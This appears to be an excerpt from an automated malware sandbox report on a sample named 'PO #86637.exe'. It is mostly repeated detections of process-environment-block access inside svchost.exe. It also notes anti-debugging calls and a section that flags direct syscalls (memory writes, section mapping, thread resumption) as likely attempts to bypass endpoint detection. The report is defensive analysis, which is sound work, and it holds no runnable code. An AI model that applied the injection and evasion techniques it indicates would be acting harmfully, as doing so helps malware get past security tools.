            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342645D mov eax, dword ptr fs:[00000030h]1_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345245A mov eax, dword ptr fs:[00000030h]1_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC460 mov ecx, dword ptr fs:[00000030h]1_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C427 mov eax, dword ptr fs:[00000030h]1_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034304E5 mov ecx, dword ptr fs:[00000030h]1_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA49A mov eax, dword ptr fs:[00000030h]1_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034364AB mov eax, dword ptr fs:[00000030h]1_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034644B0 mov ecx, dword ptr fs:[00000030h]1_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BA4B0 mov eax, dword ptr fs:[00000030h]1_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB40 mov eax, dword ptr fs:[00000030h]1_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8B42 mov eax, dword ptr fs:[00000030h]1_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428B50 mov eax, dword ptr fs:[00000030h]1_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEB50 mov eax, dword ptr fs:[00000030h]1_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342CB7E mov eax, dword ptr fs:[00000030h]1_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504B00 mov eax, dword ptr fs:[00000030h]1_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEBD0 mov eax, dword ptr fs:[00000030h]1_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EBFC mov eax, dword ptr fs:[00000030h]1_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCBF0 mov eax, dword ptr fs:[00000030h]1_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEA60 mov eax, dword ptr fs:[00000030h]1_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCA11 mov eax, dword ptr fs:[00000030h]1_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA24 mov eax, dword ptr fs:[00000030h]1_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA2E mov eax, dword ptr fs:[00000030h]1_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AD0 mov eax, dword ptr fs:[00000030h]1_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504A80 mov eax, dword ptr fs:[00000030h]1_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]1_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486AA4 mov eax, dword ptr fs:[00000030h]1_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0946 mov eax, dword ptr fs:[00000030h]1_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504940 mov eax, dword ptr fs:[00000030h]1_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov edx, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC97C mov eax, dword ptr fs:[00000030h]1_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC912 mov eax, dword ptr fs:[00000030h]1_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B892A mov eax, dword ptr fs:[00000030h]1_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C892B mov eax, dword ptr fs:[00000030h]1_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69C0 mov eax, dword ptr fs:[00000030h]1_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034649D0 mov eax, dword ptr fs:[00000030h]1_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA9D3 mov eax, dword ptr fs:[00000030h]1_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE9E0 mov eax, dword ptr fs:[00000030h]1_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov esi, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03442840 mov ecx, dword ptr fs:[00000030h]1_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460854 mov eax, dword ptr fs:[00000030h]1_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC810 mov eax, dword ptr fs:[00000030h]1_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov ecx, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A830 mov eax, dword ptr fs:[00000030h]1_2_0346A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E8C0 mov eax, dword ptr fs:[00000030h]1_2_0345E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035008C0 mov eax, dword ptr fs:[00000030h]1_2_035008C0
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
